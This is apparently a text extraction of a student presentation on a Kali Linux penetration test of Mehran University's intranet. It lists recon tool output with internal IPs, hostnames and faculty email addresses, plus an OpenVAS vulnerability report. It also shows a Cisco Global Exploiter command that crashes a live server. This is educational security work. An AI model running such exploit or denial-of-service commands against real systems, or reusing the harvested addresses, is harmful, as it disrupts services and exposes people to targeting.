You are on page 1of 30

In the Name of Allah, who is the

most merciful and beneficent


1

Mehran University of Engineering and Technology, Jamshoro.


Department of Computer Systems Engineering

Ethical Hacking: Performing Penetration


Test on LAN using Kali Linux

1.
2.
3.
4.
5.

Muzamil Hussain Samejo(11CS45) Group Leader


Junaid Ahmed Abbasi (11CS35)
Bakhtiar Ali Khushik (11CS23)
Imran Ali Babar (11CS83)
Muhammad Taqi Abbasi (11-10CS43)
Supervised by: Engr. Salahuddin Jokhio

Contents
Introduction
Ethical Hacking and Penetration Testing
Aims and Objectives
Motivation
Methodology
Tools and Technologies
Scope of Project

Background
Literature Review
Related works

Tests and Results


Conclusion and Future Work
References

Introduction: Ethical
Hacking &
Penetration Testing
Ethical hacking is testing the resources for a
good cause and for the betterment of
technology.

Technically ethical hacking means penetration


testing which is focused on securing and
protecting IT systems [1].
Penetration testing (pen testing) is the method
oftesting a computer system, network or web
application to find vulnerabilities, threats that
an attacker could exploit [2].
4

Aims and Objectives


Aim
Our major aim is to catch weaknesses and problems in the
network (MUETIntranet) in terms of security threats and
vulnerabilities etc.

Objectives
Performing the Penetration Test to detect the problem using
various tools
Analysis of detected problems
Proposal of the solution for detected problems

Motivation
The network is always vulnerable to different threats, unless security
has been ensured [15].
Penetration testing involves self hacking to test the security of the
network[14].
TheSony Pictures Entertainment cyber hackwas a release of
confidential
data
belonging
toSony Pictures Entertainment on
November 24, 2014. The data included personal information about
Sony Pictures employees and their families, e-mails between
employees, information about executive salaries at the company,
copies of unreleased Sony films, and other information. The hackers
called themselves the "Guardians of Peace" or "GOP" and demanded
the cancellation of the planned release of the film.

North Koreans were perhaps behind the


attack, due to the The Interview movie
[11].

economy $445 billion a


year: report[12].

Methodology
Reconnaissa
nce

Information
Gathering using
various tools
Scanning

Vulnerability
Analysis

Reporting

Summarization
of Results

Proposal

Solution
s to
Issues

Tools and
Technologies
Kali Linux
Tools for Reconnaissance (Information Gathering)

dnsdict6
theharvester
dnsenum
Maltego

Tools for Scanning (Vulnerability Analysis)

Nmap, zenmap
Cisco global exploiter
OpenVAS (Open Vulnerability Assessment System)

10

Why Kali Linux?


The most advanced penetration testing distribution ever
[10].
More than 300 penetration testing tools[10].
Free and always will be[10].
Vast wireless device support[10]

11

Scope of the Project


Scope is not only limited to security of networks, but
same tools can be applied to check security of web
servers and applications.
Additionally, this project can help MUET ICPC personnel
to improve the security level of the target network.
Moreover, Project helped us learning various
technologies including Linux scripting, and tools for
security analysis.

12

Background: Literature
Review
This process of systematically and actively testing a
deployed network to determine potential vulnerabilities is
called Penetration Testing, and is also known as Ethical
Hacking [3, 4].
Penetration testing helps exposing common network
misconfigurations and their security implications to the
whole network and its users [5,13].
Network security threats have been a problem since the
birth of small networks with only a few hosts
communicating over it [6].
Network threats and penetration testing is further explored
in [7, 8, 9, 10].
13

Related Works
In [7], Project of 08CS was published. It was different in sense
that they used Backtrack, another version of Linux for
penetration testing.
In [8,12], it provides system and network administrators with
descriptions of various tools that can be used to proactively
identify vulnerabilities before an adversary can.
In [9,11], The Information Technology Laboratory at the
National Institute of Standards and Technology (NIST)has
recently released a draft document that can help risk
managers appropriately scope their vulnerability assessment
and penetration testing activities while serving as a benchmark
for comparing the testing services offered by various
consultants

14

Reconnaissance
Results
Dnsdict6
Starting DNS enumeration work at muet.edu.pk. ...
Gathering NS and MX information...

root@kali:~#
dnsdict6 -d4=>-x172.16.100.3
muet.edu.pk
NS of muet.edu.pk. Is muet-02.muet.edu.pk.
NS of muet.edu.pk. Is muet-01.muet.edu.pk. => 172.16.100.220
No IPv6 address for NS entries found in DNS for domain muet.edu.pk.
MX of muet.edu.pk. Is mail.muet.edu.pk. => 121.52.157.230
MX of muet.edu.pk. Is muet-06.muet.edu.pk. => 172.16.100.11
Subdomains of muet.edu.pk
Hostname
Host IP Address
Hostname
Host IP
Address
www.muet.edu.pk
174.142.51.88
muet-01.muet.edu.pk
172.16.100.220
muet-02.muet.edu.pk 172.16.100.3
mail.muet.edu.pk
121.52.157.230
admissions.muet.edu.pk 174.142.39.199
acs.muet.edu.pk
172.16.100.201
publications.muet.edu.pk172.16.21.167
172.16.10.14
imtic.muet.edu.pk
174.142.39.199
cs.muet.edu.pk
tl.muet.edu.pk
174.142.39.199

cisco.muet.edu.pk
dp.muet.edu.pk

172.16.9.150

15

Theharvester
root@kali:~# theharvester -d muet.edu.pk -l 500 -b google
Emails found: -----------------jawaid.daudpoto@faculty.muet.edu.pk saad.kalwar@faculty.muet.edu.pk
Noman.khan@faculty.muet.edu.pk liquat.thebo@faculty.muet.edu.pk
naveed.jaffrey@faculty.muet.edu.pk vc@muet.edu.pk
Kashif.dars@admin.muet.edu.pk samejo@faculty.muet.edu.pk
naveed.jaffari@faculty.muet.edu.pk swo@muet.edu.pk
feroze.shah@faculty.muet.edu.pk suhail.soomro@faculty.muet.edu.pk
registrar@muet.edu.pk info@muet.edu.pk
Hosts found in search engines: -----------------------------------174.142.51.88: 174.142.39.199: 174.142.39.199:
admissions.muet.edu.pk
www.muet.edu.pk
publications.muet.edu.pk
174.142.39.199:
tl.muet.edu.pk

16

Dnsenum
root@kali:~# dnsenum --enum muet.edu.pk
dnsenum.pl VERSION:1.2.3
Warning: can't load Net::Whois::IP module, whois queries disabled.
----- muet.edu.pk ----- Host's addresses: __________________
muet.edu.pk. 5 IN A 172.16.100.3 muet.edu.pk. 5 IN A 172.16.100.220
muet-02.muet.edu.pk. 5 IN A 172.16.100.3

Name Servers: _

muet-01.muet.edu.pk. 5 IN A 172.16.100.220
Trying Zone Transfers and getting Bind Versions:
Trying Zone Transfer for muet.edu.pk on muet-02.muet.edu.pk ... AXFR record query failed:
Response code from server: REFUSED Trying Zone Transfer for muet.edu.pk on muet01.muet.edu.pk ... AXFR record query failed: Response code from server: REFUSED Scraping
muet.edu.pk subdomains from Google: \
---- Google search page: 1 ---Publications eesd MT Moodle
---- Google search page: 2 ---ieeep wsn4dc patco Scholars

17

Maltego

18

Scan Results
Nmap

19

20

Cisco-Global-Explioter
root@kali:~# cge.pl 172.16.100.220 2
No http server detected on 172.16.100.220 ...
root@kali:~# cge.pl 172.16.100.220 9
Input packets size : 10
Packets sent ... Please enter a server's open port : 23
Now checking server status ...
Vulnerability successful exploited. Target server is down ...

root@kali:~# cge.pl 172.16.100.220 9


Input packets size : 1
Packets sent ... Please enter a server's open port : 25
Now checking server status ...
Vulnerability unsuccessful exploited. Target server is still up ...

21

OpenVas
Host

172.16.100.3
muet02.muet.edu.p
k
total1

Most
Severe
result(s)
Severity:
High

Mediu
m

Low

Log

False
Positives

10

75

10

75

Hig
h

Service (Port)

Threat Level

cpq-wbem
(2301/tcp)

High
Medium

domain (53/tcp)

Low
22

High cpq-wbem (2301/tcp)


High (CVSS: 10.0)
NVT: HP System Management Homepage Multiple Vulnerabilities
Product detection result
cpe:/a:hp:system_management_homepage:2.1.6.156 Detected by HP System
Management Homepage (SMH) Version Detection (OID: 1.3.6.1.!
4.1.25623.1.0.900657)
Summary:
This host is running HP System Management Homepage (SMH) and is prone to
multiple vulnerabilities.
Vulnerability Insight:
- An unspecified local security vulnerability
- A denial of service vulnerability
- An input validation vulnerability
- A privilege escalation vulnerability
- An information-disclosure vulnerability
Impact:
Successful exploitation will allow attackers to gain elevated privileges, disclose
sensitive information, perform unauthorized actions, or cause denial of service
conditions.
Impact Level: System/Application
Affected Software/OS:
HP System Management Homepage (SMH) versions before 7.1.1
Solution:
Upgrade to HP System Management Homepage (SMH) version 7.1.1 or later,
For updates refer to
23
http://h18013.www1.hp.com/products/servers/management/age,!

Medium http
(80/tcp)
Medium
(CVSS: 5.0)
NVT: Microsoft IIS Tilde Character Information Disclosure
Vulnerability
Product detection result
cpe:/a:microsoft:iis:6.0 Detected by Microsoft IIS Webserver Version Detection (OID:
1.3.6.1.4.1.25623.1.,!0.900710)
Summary:
This host is running Microsoft IIS Webserver and is prone to information disclosure
vulnerability.
Vulnerability Insight:
Microsoft IIS fails to validate a specially crafted GET request containing a '~' tilde
character, which allows to disclose all short-names of folders and files having 4
letters extensions.
Impact:
Successful exploitation will allow remote attackers to obtain
sensitive information that could aid in further attacks.
Impact Level: Application
Affected Software/OS:
Microsoft Internet Information Services versions 7.5 and prior
Solution:
General solution options are to upgrade to a newer release, disable respective
features, remove the product or replace the product by another one.

24

Low domain (53/tcp)


Low (CVSS: 0.0)
NVT: POP3 Server type and version
The remote POP3 servers leak information about the
software it is running, through the login banner. This
may assist an attacker in choosing an attack strategy.
Versions and types should be omitted where possible.
The version of the remote POP3 server is :
+OK Microsoft Exchange Server 2003 server version
6.5.7638.1 (muet-02.muet.edu.,!pk) ready.
Solution: Change the login banner to something generic.

25

Conclusion
In accordance with our results, we can conclude that the
subject network i.e. MUET academic Intranet, is having certain
issues and problems. We have seen flaws and shortcomings in
overall security. A lot of ports with different level of
vulnerabilities are open. We can see that using very simple
tools, we can gather a lot of information from the network,
which could be used for negative purposes i.e. hacking attacks
or Denial of Services attack.

26

Future work
For the future work, we can carry out penetration tests on
wireless networks to increase our learning. Often
checking of security of switches and bridges.
Additionally, Penetration tests on the network for other
services, like checking the security of the Routers can be
done. Also working on the security protocols and CIA triad
of security: confidentiality, integrity and availability.

27

References
Books
[1] James Broad Andrew Bindner, Hacking With Kali ,2013, Syngress Publications, pp-123
[2] Thomas Wilhelm, Professional Penetration Testing , 2 nd Edition, 2013, Syngress
Publications,pp 186
[3]
Hamisi, N.Y., Mvungi, N.H., Mfinanga, D.A. and Mwinyiwiwa, B.M.M., Intrusion
detection by penetration test in an organization network, ICAST 2009.
[4] Bishop, M., About Penetration Testing, IEEE Security and Privacy (2007), Volume: 5,
Issue: 6.
[5] A. Bechtsoudis and N. Sklavos, Aiming at Higher Network Security Through Extensive
Penetration Tests, IEEE LATIN AMERICA TRANSACTIONS, VOL. 10, NO. 3, APRIL 2012, PP1752-1757
[6] S. Hansman and R. Hunt, A taxonomy of network and computer attacks, Computers
Security (2005), Volume: 24, Issue: 1, Publisher: Elsevier, Pages: 31-43.
[7] Dr-K, A Complete Hackers Handbook Carlton Books, 2000, pp. 49.
[8] Joel Lanz Tech Consortium Formed to Improve Software Reliability, Computerworld,
May 20, 2002,pp-12-28
[9] McClure, Scambray and Kurtz, Hacking Exposed, 2001, pp. 702.

28

Website
[10] Official Kali Linux site @ https://www.kali.org/official-documentation/
accessed 12 January,2015

last

[11] Official Computer World site@ http://


www.computerworld.com/article/2851797/security0/fake-gop-pwns-sony-networks-wo
rldwide.html
, last accessed 10/12/2014
[12] Officail Cyber site @ http
://www.cyberrisknetwork.com/2014/05/09/coverage-category-privacy-violations /, last
accessed 31/12/2014
[13] Official Vera code site @ http://www.veracode.com/security/attacks , last
accessed 23/09/2014
[14] Official Backtrack site @ http://www.backtrack-linux.org/ , last accessed
12/08/2014
[15] Official Cyber hacks Blog @ http://cehacks.blogspot.in/search/label/kali%20linux
, last accessed 10/07/2014

29

30